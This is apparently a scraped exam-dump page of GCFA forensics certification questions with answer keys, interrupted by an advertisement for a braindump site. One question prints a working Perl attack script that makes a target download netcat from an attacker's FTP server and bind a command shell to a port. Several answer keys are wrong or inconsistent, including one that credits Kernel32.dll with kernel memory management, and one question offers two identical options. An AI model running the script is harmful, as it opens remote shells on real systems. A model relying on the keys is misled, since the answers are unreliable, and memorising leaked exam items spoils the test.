NEW QUESTION: 97 Which of the following statements is true for a file in the UNIX operating system? A. It is a collection of information, which cannot be data or documents. B. It is a directory entry that points to an original file somewhere else. C. It is a collection of information, which can be data, an application, or documents. D. It is a collection of information, which can be only documents. Answer: C (LEAVE A REPLY) Explanation/Reference:

NEW QUESTION: 98 The MBR of a hard disk is a collection of boot records that contain disk information such as disk architecture, cluster size, and so on. The main work of the MBR is to locate and run necessary operating system files that are required to run a hard disk. In the context of the operating system, MBR is also known as the boot loader. Which of the following viruses can infect the MBR of a hard disk? Each correct answer represents a complete solution. Choose two. A. Multipartite B. Stealth C. File D. Boot sector Answer: A,D (LEAVE A REPLY)

NEW QUESTION: 99 Which of the following protocols allows computers on different operating systems to share files and disk storage? A. Trivial File Transfer Protocol (TFTP) B. Domain Name System (DNS) C. Network File System (NFS) D. Simple Network Management Protocol (SNMP) Answer: C (LEAVE A REPLY)

NEW QUESTION: 100 Which of the following is the process of overwriting all addressable locations on a disk? A. Sanitization B. Spoofing C. Drive wiping D. Authentication Answer: (SHOW ANSWER)

NEW QUESTION: 101 Which of the following U.S. Federal laws addresses computer crime activities in communication lines, stations, or systems? A. 18 U.S.C. 2701 B. 18 U.S.C. 1029 C. 18 U.S.C. 1362 D. 18 U.S.C. 2510 E. 18 U.S.C. 1030 Answer: C (LEAVE A REPLY)

NEW QUESTION: 102 Which of the following is a file management tool? A. Device Manager B. Defrag C. MSCONFIG D. Windows Explorer Answer: D (LEAVE A REPLY)

NEW QUESTION: 103 Which status is a problem, assigned when its cause has been recognized? A. Work-around B. Incident C. Request for Change D. Known Error Answer: D (LEAVE A REPLY)

NEW QUESTION: 104 Which of the following tools can be used by a user to hide his identity? Each correct answer represents a complete solution. Choose all that apply. A. Rootkit B. War dialer C. Anonymizer D. Proxy server E. IPchains Answer: C,D,E (LEAVE A REPLY)

NEW QUESTION: 105 Which of the following tools can be used to perform tasks such as Windows password cracking, Windows enumeration, and VoIP session sniffing? A. Cain B. L0phtcrack C. John the Ripper D. Obiwan Answer: (SHOW ANSWER)

NEW QUESTION: 106 When you start your computer, Windows operating system reports that the hard disk drive has bad sectors. What will be your first step in resolving this issue? A. Run the FORMAT command from DOS prompt. B. Run DEFRAG on the hard drive. C. Run SCANDISK with the Thorough option. D. Replace the data cable of the hard disk drive. Answer: C (LEAVE A REPLY)

NEW QUESTION: 107 Which of the following steps are generally followed in computer forensic examinations? Each correct answer represents a complete solution. Choose three. A. Acquire B. Analyze C. Authenticate D. Encrypt Answer: A,B,C (LEAVE A REPLY) NEW QUESTION: 108 Peter works as a Computer Hacking Forensic Investigator. He has been called by an organization to conduct a seminar to give necessary information related to sexual harassment within the work place. Peter started with the definition and types of sexual harassment. He then wants to convey that it is important that records of the sexual harassment incidents should be maintained, which helps in further legal prosecution. Which of the following data should be recorded in this documentation? Each correct answer represents a complete solution. Choose all that apply. A. Nature of harassment B. Names of the victims C. Date and time of incident D. Location of each incident Answer: B,C,D (LEAVE A REPLY)

NEW QUESTION: 109 You work as a Network Administrator for Web World Inc. You want to host an e-commerce Web site on your network. You want to ensure that storage of credit card information is secure. Which of the following conditions should be met to accomplish this? Each correct answer represents a complete solution. Choose all that apply. A. NT authentication should be required for all customers before they provide their credit card numbers. B. Only authorized access should be allowed to credit card information. C. The NTFS file system should be implemented on a client computer. D. Strong encryption software should be used to store credit card information. Answer: B,D (LEAVE A REPLY)

NEW QUESTION: 110 You use the FAT16 file system on your Windows 98 computer. You want to upgrade to the FAT32 file system. What is the advantage of the FAT32 file system over FAT16 file system? Each correct answer represents a complete solution. Choose two. A. It uses larger cluster sizes. B. It supports drives up to 2 terabytes (TB) in size. C. On startup failure, you can start the computer by using an MS-DOS or Windows 95 bootable floppy disk. D. It allocates disk space more efficiently. Answer: B,D (LEAVE A REPLY)

NEW QUESTION: 111 You want to perform passive footprinting against we-are-secure Inc. Web server. Which of the following tools will you use? A. Ethereal B. Ettercap C. Netcraft D. Nmap Answer: (SHOW ANSWER)

NEW QUESTION: 112 Which of the following tools is used to block email, Instant Message, Web site, or other media if inappropriate words such as pornography, violence etc. is used? A. iProtect B. iProtectYou C. Child Exploitation Tracking System D. Reveal Answer: (SHOW ANSWER)

NEW QUESTION: 113 Adam works as a Computer Hacking Forensic Investigator for a garment company in the United States. A project has been assigned to him to investigate a case of a disloyal employee who is suspected of stealing design of the garments, which belongs to the company and selling those garments of the same design under different brand name. Adam investigated that the company does not have any policy related to the copy of design of the garments. He also investigated that the trademark under which the employee is selling the garments is almost identical to the original trademark of the company. On the grounds of which of the following laws can the employee be prosecuted? A. Cyber law B. Trademark law C. Espionage law D. Copyright law Answer: B (LEAVE A REPLY)

NEW QUESTION: 114 Mark is the Administrator of a Linux computer. He wants to check the status of failed Telnet- based login attempts on the Linux computer. Which of the following shell commands will he use to accomplish the task? A. CP B. GREP C. CAT D. FSCK Answer: (SHOW ANSWER)

NEW QUESTION: 115 You want to retrieve information whether your system is in promiscuous mode or not. Which of the following commands will you use? Each correct answer represents a complete solution. Choose all that apply. A. ifconfig | grep PROMISC B. show promisc C. ip link D. grep Promisc /var/log/messages Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 116 Which of the following registry hives contains information about all users who have logged on to the system? A. HKEY_CLASSES_ROOT B. HKEY_USERS C. HKEY_CURRENT_CONFIG D. HKEY_CURRENT_USERS Answer: B (LEAVE A REPLY)

NEW QUESTION: 117 Peter works as a Security Administrator for SecureEnet Inc. He observes that the database server of the company has been compromised and the data is stolen. Peter immediately wants to report this crime to the law enforcement authorities. Which of the following organizations looks after the computer crimes investigations in the United States? A. Federal Bureau of Investigation B. Local or National office of the US secret service C. National Institute of Standards and Technology D. Incident response team Answer: B (LEAVE A REPLY)

NEW QUESTION: 118 Which of the following is a name, symbol, or slogan with which a product is identified? A. Copyright B. Patent C. Trade secret D. Trademark Answer: D (LEAVE A REPLY)

NEW QUESTION: 119 You work as a Network Administrator for Net World International. You want to configure a Windows 2000 computer to dual boot with Windows 98. The hard disk drive of the computer will be configured as a single partition drive. Which of the following file systems will you use to accomplish this? A. NTFS B. FAT32 C. HPFS D. FAT16 Answer: B (LEAVE A REPLY)

NEW QUESTION: 120 Which of the following can be monitored by using the host intrusion detection system (HIDS)? Each correct answer represents a complete solution. Choose two. A. Storage space on computers B. File system integrity C. System files D. Computer performance Answer: B,C (LEAVE A REPLY)

NEW QUESTION: 121 You are the Security Consultant working with a client who uses a lot of outdated systems. Many of their clients PC's still have Windows 98. You are concerned about the security of passwords on a Windows 98 machine. What algorithm is used in Windows 98 to hash passwords? A. SHA B. LANMAN C. MD5 D. DES Answer: B (LEAVE A REPLY)

NEW QUESTION: 122 John works as a Network Administrator for DigiNet Inc. He wants to investigate failed logon attempts to a network. He uses Log Parser to detail out the failed logons over a specific time frame. He uses the following commands and query to list all failed logons on a specific date: logparser.exe file:FailedLogons.sql -i:EVT -o:datagrid SELECT timegenerated AS LogonTime, extract_token(strings, 0, '|') AS UserName FROM Security WHERE EventID IN (529; 530; 531; 532; 533; 534; 535; 537; 539) AND to_string(timegenerated,'yyyy-MM-dd HH:mm:ss') like '2004-09%' After investigation, John concludes that two logon attempts were made by using an expired account. Which of the following EventID refers to this failed logon? A. 534 B. 532 C. 531 D. 529 Answer: B (LEAVE A REPLY)

NEW QUESTION: 123 John, a novice web user, makes a new E-mail account and keeps his password as "apple", his favorite fruit. John's password is vulnerable to which of the following password cracking attacks? Each correct answer represents a complete solution. Choose all that apply. A. Rule based attack B. Hybrid attack C. Dictionary attack D. Brute Force attack Answer: (SHOW ANSWER)

NEW QUESTION: 124 Allen works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a computer, which is used by the suspect to sexually harass the victim using instant messenger program. Suspect's computer runs on Windows operating system. Allen wants to recover password from instant messenger program, which suspect is using, to collect the evidence of the crime. Allen is using Helix Live for this purpose. Which of the following utilities of Helix will he use to accomplish the task? A. MessenPass B. Access PassView C. Asterisk Logger D. Mail Pass View Answer: (SHOW ANSWER)

NEW QUESTION: 125 Convention on Cybercrime, created by the Council of Europe, is the treaty seeking to address Computer crime and Internet crimes by harmonizing national laws, improving investigative techniques, and increasing cooperation among nations. Which of the following chapters of Convention of Cybercrime contains the provisions for mutual assistances and extradition rules related to cybercrimes? A. Chapter I B. Chapter III C. Chapter IV D. Chapter II Answer: B (LEAVE A REPLY)

NEW QUESTION: 126 John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He receives the following e-mail:

The e-mail that John has received is an example of ______. A. Spambots B. Chain letters C. Virus hoaxes D. Social engineering attacks Answer: B (LEAVE A REPLY)

NEW QUESTION: 127 You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to run a command that forces all the unwritten blocks in the buffer cache to be written to the disk. Which of the following Unix commands can you use to accomplish the task? A. sync B. tune2fs C. swapon D. swapoff Answer: A (LEAVE A REPLY)

NEW QUESTION: 128 Which of the following file systems is used by both CD and DVD? A. Universal Disk Format (UDF) B. New Technology File System (NTFS) C. Compact Disk File System (CDFS) D. Network File System (NFS) Answer: A (LEAVE A REPLY)

NEW QUESTION: 129 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate an iphone, which is being seized from a criminal. The local police suspect that this iphone contains some sensitive information. Adam knows that the storage partition of the iphone is divided into two partitions. The first partition is used for the operating system. Other data of iphone is stored in the second partition. Which of the following is the name with which the second partition is mounted on the iphone? A. /private/var B. /var/private C. /var/data D. /data/var Answer: A (LEAVE A REPLY)

NEW QUESTION: 130 Which of the following types of firewall functions at the Session layer of OSI model? A. Circuit-level firewall B. Packet filtering firewall C. Switch-level firewall D. Application-level firewall Answer: A (LEAVE A REPLY)

NEW QUESTION: 131 You work as a Network Administrator for Perfect Solutions Inc. You have to install Windows 2000 on a computer that will work as a file server. You have to format the hard disk of the computer, using a file system that supports encryption. Which of the following file systems will you use to accomplish this? A. FAT32 B. FAT16 C. NTFS D. HPFS Answer: C (LEAVE A REPLY) NEW QUESTION: 132 Which of the following firewalls depends on the three-way handshake of the TCP protocol? A. Proxy-based firewall B. Stateful firewall C. Endian firewall D. Packet filter firewall Answer: B (LEAVE A REPLY)

NEW QUESTION: 133 John works as a professional Ethical Hacker. He has been assigned the task of testing the security of www.we-are-secure.com. He has performed the footprinting step and now he has enough information to begin scanning in order to detect active computers. He sends a ping request to a computer using ICMP type 13. What kind of ICMP message is John using to send the ICMP ping request message? A. Echo request B. Address mask request C. Information request (obsolete) D. Timestamp request (obsolete) Answer: D (LEAVE A REPLY)

NEW QUESTION: 134 Which of the following modules of OS X kernel (XNU) provides the primary system program interface? A. I/O Toolkit B. BSD C. Mach D. LIBKERN Answer: B (LEAVE A REPLY)

NEW QUESTION: 135 Which of the following enables an inventor to legally enforce his right to exclude others from using his invention? A. Phishing B. Artistic license C. Patent D. Spam Answer: C (LEAVE A REPLY)

NEW QUESTION: 136 Which of the following tools is used to modify registry permissions in Windows? A. REGEDT32 B. SECEDIT C. REGEDIT D. POLEDIT Answer: A (LEAVE A REPLY)

NEW QUESTION: 137 Which of the following commands can you use to create an ext3 file system? Each correct answer represents a complete solution. Choose two. A. mkfs.ext3 B. mkfs.ext2 C. mke2fs D. mke2fs -j Answer: A,D (LEAVE A REPLY)

NEW QUESTION: 138 Adam, a malicious hacker performs an exploit, which is given below: ################################################################# $port = 53; # Spawn cmd.exe on port X $your = "192.168.1.1";# Your FTP Server 89 $user = "Anonymous";# login as $pass = '[email protected]';# password ################################################################# $host = $ARGV[0]; print "Starting ...\n"; print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ... \n"; system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ... (Have a ftp server)\n"; $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0); Which of the following is the expected result of the above exploit? A. Creates a share called "sasfile" on the target system B. Opens up a SMTP server that requires no username or password C. Opens up a telnet listener that requires no username or password D. Creates an FTP server with write permissions enabled Answer: (SHOW ANSWER)

NEW QUESTION: 139 John works as a professional Ethical Hacker. He is assigned a project to test the security of www.weare- secure.com. He is working on the Linux operating system. He wants to sniff the we- are-secure network and intercept a conversation between two employees of the company through session hijacking. Which of the following tools will John use to accomplish the task? A. Hunt B. IPChains C. Tripwire D. Ethercap Answer: A (LEAVE A REPLY)

NEW QUESTION: 140 Which of the following switches is used with Pslist command on the command line to show the statistics for all active threads on the system, grouping these threads with their owning process? A. Pslist -m B. Pslist -x C. Pslist -d D. Pslist -t Answer: C (LEAVE A REPLY)

NEW QUESTION: 141 Which of the following needs to be documented to preserve evidences for presentation in court? A. Separation of duties B. Chain of custody C. Incident response policy D. Account lockout policy Answer: B (LEAVE A REPLY)

NEW QUESTION: 142 Joseph works as a Software Developer for WebTech Inc. He wants to protect the algorithms and the techniques of programming that he uses in developing an application. Which of the following laws are used to protect a part of software? A. Patent laws B. Trademark laws C. Copyright laws D. Code Security law Answer: A (LEAVE A REPLY)

NEW QUESTION: 143 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate the BlackBerry, which is suspected to be used to hide some important information. Which of the following is the first step taken to preserve the information in forensic investigation of the BlackBerry? A. Turn off the BlackBerry. B. Remove the storage media. C. Eliminate the ability of the device to receive the push data. D. Keep BlackBerry in 'ON' state. Answer: C (LEAVE A REPLY)

NEW QUESTION: 144 Adam works as a Computer Hacking Forensic Investigator. He has been assigned a project to investigate child pornography. As the first step, Adam found that the accused is using a Peer-to- peer application to network different computers together over the internet and sharing pornographic materials of children with others. Which of the following are Peer-to-Peer applications? Each correct answer represents a complete solution. Choose all that apply. A. Kismet B. Hamachi C. Gnutella D. Freenet Answer: (SHOW ANSWER)

NEW QUESTION: 145 Which of the following are the primary goals of the incident handling team? Each correct answer represents a complete solution. Choose all that apply. A. Prevent any further damage. B. Repair any damage caused by an incident. C. Inform higher authorities. D. Freeze the scene. Answer: (SHOW ANSWER)

NEW QUESTION: 146 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a compromised system of a cyber criminal, who hides some information in his computer. This computer runs on Linux operating system. Adam wants to extract the data units of a file, which is specified by its meta-data address. He is using the Sleuth Kit for this purpose. Which of the following commands in the Sleuth kit will he use to accomplish the task? A. icat B. dcat C. ifind D. istat Answer: (SHOW ANSWER)

NEW QUESTION: 147 Which of the following functionality within the Autopsy browser is specifically designed to aid in case management? A. Image integrity B. Keyword searches C. File listing D. Hash database Answer: (SHOW ANSWER)

NEW QUESTION: 148 Which of the following is the correct order of loading system files into the main memory of the system, when the computer is running on Microsoft's Windows XP operating system? A. NTLDR, BOOT.ini, NTDETECT.com, HAL.dll, NTOSKRNL.exe B. BOOT.ini, HAL.dll, NTDETECT.com, NTLDR, NTOSKRNL.exe C. NTLDR, BOOT.ini, HAL.dll, NTDETECT.com, NTOSKRNL.exe D. NTLDR, BOOT.ini, HAL.dll, NTDETECT.com, NTOSKRNL.exe Answer: (SHOW ANSWER)

NEW QUESTION: 149 You are responsible for all computer security at your company. This includes initial investigation into alleged unauthorized activity. Which of the following are possible results of improperly gathering forensic evidence in an alleged computer crime by an employee? Each correct answer represents a complete solution. Choose three. A. Your company is unable to pursue the case against a perpetrator. B. You are charged with criminal acts. C. Your company is sued for defaming the character of an accused party. D. You falsely accuse an innocent employee. Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 150 Which of the following evidences are the collection of facts that, when considered together, can be used to infer a conclusion about the malicious activity/person? A. Incontrovertible B. Direct C. Circumstantial D. Corroborating Answer: (SHOW ANSWER)

NEW QUESTION: 151 You want to upgrade a partition in your computer's hard disk drive from FAT to NTFS. Which of the following DOS commands will you use to accomplish this? A. SYS C: B. FDISK /mbr C. FORMAT C: /s D. CONVERT C: /fs:ntfs Answer: D (LEAVE A REPLY)

NEW QUESTION: 152 Which of the following methods can be used to start the Disk Defragmenter utility in Windows 9x? Each correct answer represents a complete solution. Choose two. A. From Start menu > Programs > Accessories > System Tools, click Disk Defragmenter. B. From Start menu > Programs, click Disk Defragmenter. C. From Start menu > Programs > Windows Explorer, right-click on the drive to be defragmented, then click the Disk Defragmenter in the popup window. D. From Start menu > Programs > Windows Explorer, right-click on the drive to be defragmented > click Properties in the popup menu > Tools tab, then click the Defragment Now button. Answer: (SHOW ANSWER)

NEW QUESTION: 153 John works as a professional Ethical Hacker. He has been assigned a project for testing the security of www.we-are-secure.com. He wants to corrupt an IDS signature database so that performing attacks on the server is made easy and he can observe the flaws in the We-are- secure server. To perform his task, he first of all sends a virus that continuously changes its signature to avoid detection from IDS. Since the new signature of the virus does not match the old signature, which is entered in the IDS signature database, IDS becomes unable to point out the malicious virus. Which of the following IDS evasion attacks is John performing? A. Polymorphic shell code attack B. Evasion attack C. Session splicing attack D. Insertion attack Answer: A (LEAVE A REPLY)

NEW QUESTION: 154 In 2001, the Council of Europe passed a convention on cybercrime. It was the first international treaty seeking to address computer crime and Internet crimes by harmonizing national laws, improving investigative techniques, and increasing cooperation among nations. On 1 March 2006, the Additional Protocol to the Convention on Cybercrime came into force. Which of the following statements clearly describes this protocol? A. English speaking states in Europe such as Ireland and the United Kingdom should sign the convention. B. The convention of cybercrime should immediately be put on hold until there is an inclusion of a new or amended article. C. The convention of cybercrime is only applied within Europe. D. It requires participating states to criminalize the dissemination of racist and xenophobic material through computer systems. Answer: D (LEAVE A REPLY)

NEW QUESTION: 155 A firewall is a combination of hardware and software, used to provide security to a network. It is used to protect an internal network or intranet against unauthorized access from the Internet or other outside networks. It restricts inbound and outbound access and can analyze all traffic between an internal network and the Internet. Users can configure a firewall to pass or block packets from specific IP addresses and ports. Which of the following tools works as a firewall for the Linux 2.4 kernel? A. IPChains B. OpenSSH C. Stunnel D. IPTables Answer: D (LEAVE A REPLY)

NEW QUESTION: 156 Based on the case study, to implement more security, which of the following additional technologies should you implement for laptop computers? (Click the Exhibit button on the toolbar to see the case study.) Each correct answer represents a complete solution. Choose two. A. PAP authentication B. Digital certificates C. Two-factor authentication D. Encrypting File System (EFS) E. Encrypted Data Transmissions Answer: B,D (LEAVE A REPLY)

NEW QUESTION: 157 Adam works as a professional Computer Hacking Forensic Investigator with the local police of his area. A project has been assigned to him to investigate a PDA seized from a local drug dealer. It is expected that many valuable and important information are stored in this PDA. Adam follows investigative methods, which are required to perform in a pre-defined sequential manner for the successful forensic investigation of the PDA. Which of the following is the correct order to perform forensic investigation of PDA? A. Examination, Collection, Identification, Documentation B. Documentation, Examination, Identification, Collection C. Examination, Identification, Collection, Documentation D. Identification, Collection, Examination, Documentation Answer: C (LEAVE A REPLY)

NEW QUESTION: 158 Which of the following types of firewall ensures that the packets are part of the established session? A. Stateful inspection firewall B. Application-level firewall C. Switch-level firewall D. Circuit-level firewall Answer: A (LEAVE A REPLY) NEW QUESTION: 159 Which of the following methods is used by forensic investigators to acquire an image over the network in a secure manner? A. DOS boot disk B. Secure Authentication for EnCase (SAFE) C. EnCase with a hardware write blocker D. Linux Live CD Answer: B (LEAVE A REPLY)

NEW QUESTION: 160 Nathan works as a Computer Hacking Forensic Investigator for SecureEnet Inc. He uses Visual TimeAnalyzer software to track all computer usage by logging into individual users account or specific projects and compile detailed accounts of time spent within each program. Which of the following functions are NOT performed by Visual TimeAnalyzer? Each correct answer represents a complete solution. Choose all that apply. A. It gives parents control over their children's use of the personal computer. B. It monitors all user data such as passwords and personal documents. C. It tracks work time, pauses, projects, costs, software, and internet usage. D. It records specific keystrokes and run screen captures as a background process. Answer: B,D (LEAVE A REPLY)

NEW QUESTION: 161 You company suspects an employee of sending unauthorized emails to competitors. These emails are alleged to contain confidential company data. Which of the following is the most important step for you to take in preserving the chain of custody? A. Make copies of that employee's email. B. Seize the employee's PC. C. Preserve the email server including all logs. D. Place spyware on the employee's PC to confirm these activities. Answer: C (LEAVE A REPLY)

NEW QUESTION: 162 Which of the following files contains the salted passwords in the Linux operating system? A. /etc/shadow B. /etc/passwd C. /bin/shadow D. /bin/passwd Answer: A (LEAVE A REPLY)

NEW QUESTION: 163 Which of the following attacks saturates network resources and disrupts services to a specific computer? A. Replay attack B. Denial-of-Service (DoS) attack C. Polymorphic shell code attack D. Teardrop attack Answer: B (LEAVE A REPLY)

NEW QUESTION: 164 You work as a professional Computer Hacking Forensic Investigator. A project has been assigned to you to investigate Plagiarism occurred in the source code files of C#. Which of the following tools will you use to detect the software plagiarism? A. Turnitin B. SCAM C. Jplag D. VAST Answer: C (LEAVE A REPLY)

NEW QUESTION: 165 Your Windows XP hard drive has 2 partitions. The system partition is NTFS and the other is FAT. You wish to encrypt a folder created on the system partition for the purpose of data security. Which of the following statements is true about this situation? A. You can only encrypt files on the FAT partition. B. Since the operating system is on the NTFS partition, you can encrypt files on both. C. You cannot encrypt files on either partition. D. You can only encrypt files on the NTFS partition. Answer: D (LEAVE A REPLY)

NEW QUESTION: 166 You are the Security Consultant and have been hired to check security for a client's network. Your client has stated that he has many concerns but the most critical is the security of Web applications on their Web server. What should be your highest priority then in checking his network? A. Setting up IDS B. Setting up a honey pot C. Vulnerability scanning D. Port scanning Answer: C (LEAVE A REPLY) Valid GCFA Dumps shared by PrepAwayExam.com for Helping Passing GCFA Exam! PrepAwayExam.com now offer the newest GCFA exam dumps, the PrepAwayExam.com GCFA exam questions have been updated and answers have been corrected get the newest PrepAwayExam.com GCFA dumps with Test Engine here: https://www.prepawayexam.com/GIAC/braindumps.GCFA.ete.file.html (318 Q&As Dumps, 40%OFF Special Discount: freecram)

NEW QUESTION: 167 You work as a Network Administrator for a bank. For securing the bank's network, you configure a firewall and an IDS. In spite of these security measures, intruders are able to attack the network. After a close investigation, you find that your IDS is not configured properly and hence is unable to generate alarms when needed. What type of response is the IDS giving? A. True Positive B. False Positive C. True Negative D. False Negative Answer: (SHOW ANSWER)

NEW QUESTION: 168 John is a black hat hacker. FBI arrested him while performing some email scams. Under which of the following US laws will john be charged? A. 18 U.S.C. 2510 B. 18 U.S.C. 2701 C. 18 U.S.C. 1030 D. 18 U.S.C. 1362 Answer: (SHOW ANSWER)

NEW QUESTION: 169 Adam works as an Incident Handler for Umbrella Inc. He is informed by the senior authorities that the server of the marketing department has been affected by a malicious hacking attack. Supervisors are also claiming that some sensitive data are also stolen. Adam immediately arrived to the server room of the marketing department and identified the event as an incident. He isolated the infected network from the remaining part of the network and started preparing to image the entire system. He captures volatile data, such as running process, ram, and network connections. Which of the following steps of the incident handling process is being performed by Adam? A. Eradication B. Identification C. Recovery D. Containment Answer: D (LEAVE A REPLY)

NEW QUESTION: 170 You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to fix partitions on a hard drive. Which of the following Unix commands can you use to accomplish the task? A. fsck B. exportfs C. fdformat D. fdisk Answer: D (LEAVE A REPLY)

NEW QUESTION: 171 Which of the following is a documentation of guidelines that computer forensics experts use to handle evidences? A. Chain of custody B. Incident response policy C. Chain of evidence D. Evidence access policy Answer: A (LEAVE A REPLY)

NEW QUESTION: 172 Which of the following Acts enacted in United States amends Civil Rights Act of 1964, providing technical changes affecting the length of time allowed to challenge unlawful seniority provisions, to sue the federal government for discrimination and to bring age discrimination claims? A. PROTECT Act B. Civil Rights Act of 1991 C. Sexual Predators Act D. The USA Patriot Act of 2001 Answer: B (LEAVE A REPLY)

NEW QUESTION: 173 You are working with a team that will be bringing in new computers to a sales department at a company. The sales team would like to keep not only their old files, but system settings as well on the new PC's. What should you do? A. Do a system backup (complete) on each old machine, then restore it onto the new machines B. Use the User State Migration tool to move the system settings and files to the new machines. C. Copy the files and the Windows Registry to a removable media then copy it onto the new machines. D. Use the Disk Management tool to move everything to the new computer. Answer: B (LEAVE A REPLY)

NEW QUESTION: 174 Which of the following two cryptography methods are used by NTFS Encrypting File System (EFS) to encrypt the data stored on a disk on a file-by-file basis? A. Twofish B. Public key C. Digital certificates D. RSA Answer: B,C (LEAVE A REPLY)

NEW QUESTION: 175 You work as a Network Administrator for Blue Bell Inc. You want to install Windows XP Professional on your computer, which already has Windows Me installed. You want to configure your computer to dual boot between Windows Me and Windows XP Professional. You have a single 40GB hard disk. Which of the following file systems will you choose to dual-boot between the two operating systems? A. NTFS B. FAT32 C. CDFS D. FAT Answer: B (LEAVE A REPLY)

NEW QUESTION: 176 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a multimedia enabled mobile phone, which is suspected to be used in a cyber crime. Adam uses a tool, with the help of which he can recover deleted text messages, photos, and call logs of the mobile phone. Which of the following tools is Adam using? A. FTK Imager B. Device Seizure C. FAU D. Galleta Answer: B (LEAVE A REPLY)

NEW QUESTION: 177 You are the Network Administrator and your company has recently implemented encryption for all emails. You want to check to make sure that the email packages are being encrypted. What tool would you use to accomplish this? A. Vulnerability analyzer B. Password cracker C. Performance Monitor D. Packet sniffer Answer: (SHOW ANSWER)

NEW QUESTION: 178 On your dual booting computer, you want to set Windows 98 as the default operating system at startup. In which file will you define this? A. NTBOOTDD.SYS B. NTDETECT.COM C. BOOTSECT.DOS D. BOOT.INI Answer: D (LEAVE A REPLY)

NEW QUESTION: 179 Which of the following tools works by using standard set of MS-DOS commands and can create an MD5 hash of an entire drive, partition, or selected files? A. Device Seizure B. DriveSpy C. Forensic Sorter D. Ontrack Answer: (SHOW ANSWER)

NEW QUESTION: 180 You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network. You are configuring a wireless LAN on the network. You experience interference on your network. Through investigation, you come to know that three foreign WAPs are within the range of your LAN. Although they have different SSIDs than yours, they are working on the same channel as yours. Which of the following steps will you take to reduce the interference? A. Install an external antenna. B. Install a router on your network. C. Configure the same SSID as of the foreign networks. D. Change your WAP's channel. Answer: (SHOW ANSWER)

NEW QUESTION: 181 By gaining full control of router, hackers often acquire full control of the network. Which of the following methods are commonly used to attack Routers? Each correct answer represents a complete solution. Choose all that apply. A. By launching Max Age attack B. By launching Social Engineering attack C. Route table poisoning D. By launching Sequence++ attack Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 182 Which of the following is NOT an example of passive footprinting? A. Querying the search engine. B. Performing the whois query. C. Scanning ports. D. Analyzing job requirements. Answer: C (LEAVE A REPLY)

NEW QUESTION: 183 Which of the following are the benefits of information classification for an organization? Each correct answer represents a complete solution. Choose two. A. It helps identify which information is the most sensitive or vital to an organization. B. It helps identify which protections apply to which information. C. It helps reduce the Total Cost of Ownership (TCO). D. It ensures that modifications are not made to data by unauthorized personnel or processes. Answer: (SHOW ANSWER)

NEW QUESTION: 184 Which of the following is a set of exclusive rights granted by a state to an inventor or his assignee for a fixed period of time in exchange for the disclosure of an invention? A. Copyright B. Utility model C. Patent D. Snooping Answer: (SHOW ANSWER)

NEW QUESTION: 185 Which of the following representatives of incident response team takes forensic backups of the systems that are the focus of the incident? A. Lead investigator B. Legal representative C. Technical representative D. Information security representative Answer: (SHOW ANSWER)

NEW QUESTION: 186 In a Windows 98 computer, which of the following utilities is used to convert a FAT16 partition to FAT32? A. CONVERT16.EXE B. CONVERT.EXE C. CVT16.EXE D. CVT1.EXE Answer: (SHOW ANSWER)

NEW QUESTION: 187 You work as a Forensic Investigator. Which of the following rules will you follow while working on a case? Each correct answer represents a part of the solution. Choose all that apply. A. Examine original evidence and never rely on the duplicate evidence. B. Prepare a chain of custody and handle the evidence carefully. C. Never exceed the knowledge base of the forensic investigation. D. Follow the rules of evidence and never temper with the evidence. Answer: A,B,C,D (LEAVE A REPLY)

NEW QUESTION: 188 In Linux, which of the following files describes the processes that are started up during boot up? A. /etc/shadow B. /etc/passwd C. /etc/inittab D. /etc/profile Answer: C (LEAVE A REPLY)

NEW QUESTION: 189 You are responsible for tech support at your company. You have been instructed to make certain that all desktops support file and folder encryption. Which file system should you use when installing Windows XP? A. NTFS B. FAT32 C. FAT D. EXT4 Answer: A (LEAVE A REPLY)

NEW QUESTION: 190 Which of the following is a password-cracking program? A. SubSeven B. Netcat C. L0phtcrack D. NetSphere Answer: C (LEAVE A REPLY)

NEW QUESTION: 191 Which of the following sections of United States Economic Espionage Act of 1996 criminalizes the misappropriation of trade secrets related to or included in a product that is produced for or placed in interstate commerce, with the knowledge or intent that the misappropriation will injure the owner of the trade secret? A. Title 18, U.S.C. 1831 B. Title 18, U.S.C. 1832 C. Title 18, U.S.C. 1834 D. Title 18, U.S.C. 1839 Answer: B (LEAVE A REPLY)

NEW QUESTION: 192 Which of the following file systems supports the hot fixing feature? A. exFAT B. FAT16 C. FAT32 D. NTFS Answer: D (LEAVE A REPLY)

NEW QUESTION: 193 Which of the following Windows XP system files handles memory management, I/O operations, and interrupts? A. Ntoskrnl.exe B. Win32k.sys C. Kernel32.dll D. Advapi32.dll Answer: C (LEAVE A REPLY)

NEW QUESTION: 194 Adam works as a professional Computer Hacking Forensic Investigator. He has been assigned with a project to investigate a computer in the network of SecureEnet Inc. The compromised system runs on Windows operating system. Adam decides to use Helix Live for Windows to gather data and electronic evidences starting with retrieving volatile data and transferring it to server component via TCP/IP. Which of the following application software in Helix Windows Live will he use to retrieve volatile data and transfer it to the server component via TCP/IP? A. FTK imager B. FAU C. FSP D. Drive Manager Answer: C (LEAVE A REPLY)

